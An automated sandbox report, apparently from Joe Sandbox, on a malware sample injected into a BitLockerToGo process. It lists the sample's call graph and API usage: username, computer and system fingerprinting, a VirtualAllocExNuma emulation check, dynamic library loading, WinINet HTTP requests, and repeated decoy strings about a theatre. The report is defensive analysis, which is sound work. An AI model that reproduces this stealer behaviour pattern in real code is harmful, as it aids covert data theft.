3059310 construct 8 API calls 14298->14300 14299 305934f 14299->14267 14300->14298 14300->14299 14302 3059371 _Copy_impl 14301->14302 14305 3059660 14302->14305 14306 3059665 14305->14306 14307 3058afb 14306->14307 14308 3059850 task memcpy 14306->14308 14307->14268 14308->14306 14311 3059504 construct 14309->14311 14310 305932c 14310->14226 14311->14310 14313 3059540 14311->14313 14314 30595a0 construct 8 API calls 14313->14314 14315 3059563 14314->14315 14316 30595a0 construct 8 API calls 14315->14316 14317 3059575 14316->14317 14317->14310 14321 30596d0 14318->14321 14323 30596e7 construct 14321->14323 14322 30592ec 14322->14226 14323->14322 14324 3059540 construct 8 API calls 14323->14324 14324->14322 14326 30583d6 14325->14326 14331 30583d1 std::error_category::default_error_condition 14325->14331 14327 3058457 14326->14327 14328 30583ff 14326->14328 14349 3058560 14327->14349 14334 3058a90 14328->14334 14331->14236 14332 3058407 construct 14332->14331 14338 3058740 14332->14338 14335 3058aa5 14334->14335 14353 3058e10 14335->14353 14339 3058752 construct 14338->14339 14340 30587ef 14339->14340 14342 3058769 construct 14339->14342 14341 30584f0 9 API calls 14340->14341 14344 3058807 construct 14340->14344 14341->14344 14343 30584f0 9 API calls 14342->14343 14346 305879d construct 14342->14346 14343->14346 14345 3059310 construct 8 API calls 14344->14345 14347 30587db 14345->14347 14348 3059310 construct 8 API calls 14346->14348 14347->14332 14348->14347 14350 305856f task 14349->14350 14352 305858c task 14349->14352 14351 3058ae0 task memcpy 14350->14351 14351->14352 14352->14331 14354 3058e29 std::error_category::default_error_condition 14353->14354 14355 3058acf 14354->14355 14359 30593a0 14354->14359 14355->14332 14358 3058ae0 task memcpy 14358->14355 14360 30593b1 _Copy_impl 14359->14360 14363 3059690 14360->14363 14365 3059695 construct 14363->14365 14364 3058e60 14364->14358 14365->14364 14366 3059720 _Copy_impl 8 API calls 14365->14366 14366->14365 14368 30689f9 14367->14368 14369 3068a07 malloc 14368->14369 14370 30689ff 14368->14370 14369->14370 14371 3068a25 14369->14371 14370->13753 14371->14370 14372 3068a6d memset 14371->14372 14372->14370 14373 3066490 14391 30522a0 14373->14391 14377 30664a0 14484 3051160 GetSystemInfo 14377->14484 14383 30664c1 14384 30664c6 GetUserDefaultLangID 14383->14384 14385 30672f0 GetUserNameA 14384->14385 14386 30664d0 14385->14386 14387 3067380 GetComputerNameA 14386->14387 14389 30664e3 14387->14389 14388 30655f0 133 API calls 14390 30665b6 14388->14390 14389->14388 14392 3054610 34 API calls 14391->14392 14393 30522b4 14392->14393 14394 3054610 34 API calls 14393->14394 14395 30522cd 14394->14395 14396 3054610 34 API calls 14395->14396 14397 30522e6 14396->14397 14398 3054610 34 API calls 14397->14398 14399 30522ff 14398->14399 14400 3054610 34 API calls 14399->14400 14401 3052318 14400->14401 14402 3054610 34 API calls 14401->14402 14403 3052331 14402->14403 14404 3054610 34 API calls 14403->14404 14405 305234a 14404->14405 14406 3054610 34 API calls 14405->14406 14407 3052363 14406->14407 14408 3054610 34 API calls 14407->14408 14409 305237c 14408->14409 14410 3054610 34 API calls 14409->14410 14411 3052395 14410->14411 14412 3054610 34 API calls 14411->14412 14413 30523ae 14412->14413 14414 3054610 34 API calls 14413->14414 14415 30523c7 14414->14415 14416 3054610 34 API calls 14415->14416 14417 30523e0 14416->14417 14418 3054610 34 API calls 14417->14418 14419 30523f9 14418->14419 14420 3054610 34 API calls 14419->14420 14421 3052412 14420->14421 14422 3054610 34 API calls 14421->14422 14423 305242b 14422->14423 14424 3054610 34 API calls 14423->14424 14425 3052444 14424->14425 14426 3054610 34 API calls 14425->14426 14427 305245d 14426->14427 14428 3054610 34 API calls 14427->14428 14429 3052476 14428->14429 14430 3054610 34 API calls 14429->14430 14431 305248f 14430->14431 14432 3054610 34 API calls 14431->14432 14433 30524a8 14432->14433 14434 3054610 34 API calls 14433->14434 14435 30524c1 14434->14435 14436 3054610 34 API calls 14435->14436 14437 30524da 14436->14437 14438 3054610 34 API calls 14437->14438 14439 30524f3 14438->14439 14440 3054610 34 API calls 14439->14440 14441 305250c 14440->14441 14442 3054610 34 API calls 14441->14442 14443 3052525 14442->14443 14444 3054610 34 API calls 14443->14444 14445 305253e 14444->14445 14446 3054610 34 API calls 14445->14446 14447 3052557 14446->14447 14448 3054610 34 API calls 14447->14448 14449 3052570 14448->14449 14450 3054610 34 API calls 14449->14450 14451 3052589 14450->14451 14452 3054610 34 API calls 14451->14452 14453 30525a2 14452->14453 14454 3054610 34 API calls 14453->14454 14455 30525bb 14454->14455 14456 3054610 34 API calls 14455->14456 14457 30525d4 14456->14457 14458 3054610 34 API calls 14457->14458 14459 30525ed 14458->14459 14460 3054610 34 API calls 14459->14460 14461 3052606 14460->14461 14462 3054610 34 API calls 14461->14462 14463 305261f 14462->14463 14464 3054610 34 API calls 14463->14464 14465 3052638 14464->14465 14466 3054610 34 API calls 14465->14466 14467 3052651 14466->14467 14468 3054610 34 API calls 14467->14468 14469 305266a 14468->14469 14470 3054610 34 API calls 14469->14470 14471 3052683 14470->14471 14472 3054610 34 API calls 14471->14472 14473 305269c 14472->14473 14474 3054610 34 API calls 14473->14474 14475 30526b5 14474->14475 14476 3054610 34 API calls 14475->14476 14477 30526ce 14476->14477 14478 3069270 14477->14478 14495 3069160 GetPEB 14478->14495 14480 30694a3 LoadLibraryA LoadLibraryA 14481 30694d3 LoadLibraryA 14480->14481 14482 30694f6 14481->14482 14482->14377 14483 3069278 14483->14480 14485 305117c 14484->14485 14486 3051110 14485->14486 14487 3051131 VirtualAllocExNuma 14486->14487 14488 3051141 14487->14488 14496 30510a0 VirtualAlloc 14488->14496 14490 305114e 14491 3051220 14490->14491 14498 3068450 14491->14498 14494 3051249 __aulldiv 14494->14383 14495->14483 14497 30510c2 ctype 14496->14497 14497->14490 14499 3051233 GlobalMemoryStatusEx 14498->14499 14499->14494

                                    Executed Functions

                                    Function 03054610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114stringmemoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 0305461C
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 03054627
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 03054632
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 0305463D
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 03054648
                                    • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,0306649B), ref: 03054657
                                    • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,0306649B), ref: 0305465E
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 0305466C
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 03054677
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 03054682
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 0305468D
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 03054698
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 030546AC
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 030546B7
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 030546C2
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 030546CD
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 030546D8
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054701
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0305470C
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054717
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054722
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0305472D
                                    • strlen.MSVCRT ref: 03054740
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054768
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054773
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0305477E
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054789
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054794
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030547A4
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030547AF
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030547BA
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030547C5
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030547D0
                                    • VirtualProtect.KERNELBASE(?,00000004,00000100,00000000), ref: 030547EC
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030547B5
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0305467D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054728
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0305476E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054779
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030547C0
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0305471D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054688
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0305479F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0305462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0305478F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030547CB
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030546C8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054672
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030546D3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054693
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054667
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054712
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054763
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030547AA
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030546FC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030546B2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054784
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030546A7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 03054707
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030546BD
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 2127927946-2218711628
                                    • Opcode ID: e92fd9bfe955f1e4ba172cc5ea9bb00965487fe88c4eb3d75e7b44bd66e03f23
                                    • Instruction ID: 3e8d4ee8a058834b5db21d9223f99b8d22ecb2d90e3c32b92883b747ec783704
                                    • Opcode Fuzzy Hash: e92fd9bfe955f1e4ba172cc5ea9bb00965487fe88c4eb3d75e7b44bd66e03f23
                                    • Instruction Fuzzy Hash: 4341FC79A43704EFE718FBE4ED8DADD7B70AB49702B008060F5229D14EC6789581DB3A
                                    Function 030562D0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 191networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 03054800: ??_U@YAPAXI@Z.MSVCRT ref: 0305483A
                                      • Part of subcall function 03054800: ??_U@YAPAXI@Z.MSVCRT ref: 03054851
                                      • Part of subcall function 03054800: ??2@YAPAXI@Z.MSVCRT ref: 03054868
                                      • Part of subcall function 03054800: InternetCrackUrlA.WININET(00000000,00000000), ref: 03054899
                                    • InternetOpenA.WININET(03070DE6,00000001,00000000,00000000,00000000,03070DE3), ref: 03056331
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 03056385
                                    • HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 030563D5
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 03056421
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 030564BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$??2@ConnectCrackFileReadSend
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 488451522-2509457195
                                    • Opcode ID: a6bf43770901e76aeafee189239a6d277e6d0c5625f7999a06f6f1576e377ee7
                                    • Instruction ID: 620905acd45006d869851a184c66659ba7f7e2e381adeb0d1b3353ace85a3223
                                    • Opcode Fuzzy Hash: a6bf43770901e76aeafee189239a6d277e6d0c5625f7999a06f6f1576e377ee7
                                    • Instruction Fuzzy Hash: 1D716FB5A01318ABDB14EFA4DC49BEEB778BF44700F508199F50A6F188DBB16A84CF51
                                    Function 030672F0 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0306733F
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: 4630b1f261423eccd2e5f8f6553cc2ee4c8b51755a394c095b3d6f3aa40cadc2
                                    • Instruction ID: 5c85837a2022217e6b4e479a9901b61e66f84e32e97fc9af868d96c1d8954d76
                                    • Opcode Fuzzy Hash: 4630b1f261423eccd2e5f8f6553cc2ee4c8b51755a394c095b3d6f3aa40cadc2
                                    • Instruction Fuzzy Hash: F5F062B1944258EFC700DF99DC49FAEFBB8FB44B21F10061AFA15A3684C7745504CBA1
                                    Function 03051160 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,030664B7,03070ADA), ref: 0305116A
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: InfoSystem
                                    • String ID:
                                    • API String ID: 31276548-0
                                    • Opcode ID: 8a18c2188b5ed8b538cd54db643798a810857626290d9b5add2143aef2469d5f
                                    • Instruction ID: 70e271e13b4811a445da11c8d2ef7b7139cff400f57fba7bcaf98b2054cc36f4
                                    • Opcode Fuzzy Hash: 8a18c2188b5ed8b538cd54db643798a810857626290d9b5add2143aef2469d5f
                                    • Instruction Fuzzy Hash: 93D05E74D0021CDBCB04EFF4A94DADDBB7CBB0C211F004696EC0562244DA305842CA66
                                    Function 030695E0 Relevance: 18.2, APIs: 8, Strings: 2, Instructions: 684libraryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 725 30695e0-30695ea 726 3069a06-3069a9a LoadLibraryA * 8 725->726 727 30695f0-3069a01 725->727 728 3069b16-3069b1d 726->728 729 3069a9c-3069b11 726->729 727->726 731 3069be6-3069bed 728->731 732 3069b23-3069be1 728->732 729->728 733 3069bef-3069c63 731->733 734 3069c68-3069c6f 731->734 732->731 733->734 737 3069d07-3069d0e 734->737 738 3069c75-3069d02 734->738 742 3069d14-3069dea 737->742 743 3069def-3069df6 737->743 738->737 742->743 746 3069e72-3069e79 743->746 747 3069df8-3069e6d 743->747 751 3069eac-3069eb3 746->751 752 3069e7b-3069ea7 746->752 747->746 754 3069ee5-3069eec 751->754 755 3069eb5-3069ee0 751->755 752->751 760 3069fe2-3069fe9 754->760 761 3069ef2-3069fdd 754->761 755->754 771 306a04d-306a054 760->771 772 3069feb-306a048 760->772 761->760 774 306a056-306a069 771->774 775 306a06e-306a075 771->775 772->771 774->775 781 306a077-306a0d3 775->781 782 306a0d8-306a0d9 775->782 781->782
                                    APIs
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A0D
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A1E
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A30
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A42
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A53
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A65
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A77
                                    • LoadLibraryA.KERNELBASE(?,?,03065783,?,00000034,00000064,030660A0,?,0000002C,00000064,03066040,?,00000030,00000064,Function_000155B0,?), ref: 03069A88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 1029625771-1775429166
                                    • Opcode ID: 21dbb6831ebf70fda8dbd1de7b03783f973f859e93a70a0b6c403431ac7859bd
                                    • Instruction ID: f8aac620b219318e69d49aaad4791ae371ad51cd1e9d664f6efdb744a2306692
                                    • Opcode Fuzzy Hash: 21dbb6831ebf70fda8dbd1de7b03783f973f859e93a70a0b6c403431ac7859bd
                                    • Instruction Fuzzy Hash: DB6209B6610220EFC754FFB9F88CE1A3BA9BB8C741754D51AE609C324CD734A842DB65
                                    Function 030548D0 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 479networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
